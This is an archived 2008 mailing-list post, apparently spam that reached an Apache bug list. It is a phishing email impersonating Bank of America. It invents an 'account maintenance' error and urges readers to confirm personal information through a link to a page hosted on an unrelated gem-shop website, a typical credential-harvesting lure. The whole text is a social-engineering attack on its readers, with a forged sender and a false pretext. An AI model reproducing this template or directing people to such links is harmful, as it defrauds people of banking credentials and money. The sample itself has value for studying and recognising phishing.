Posted to bugs@xml.apache.org by Bank Of America <ac...@customerservice.com> on 2008/09/23 14:34:40 UTC

Please Update Your Profile

Dear Bank Of America Customer,

During our regularly scheduled account maintenance and verification procedures, we have detected a slight error in your account information. To securely confirm your personal information please click on the link bellow:

http://tracysgemshop.com/catalog/images/security/index.htm

Confirm Your Bank Of America Account now to enjoy the benefits of online banking and finance to avoid identity theft and fraudulent activities on your account.
Note: THIS IS AN GENERATED MESSAGE activity.

Bank of America, N.A. Member FDIC. Equal Housing Lender
c 2008 Bank of America Corporation. All rights reserved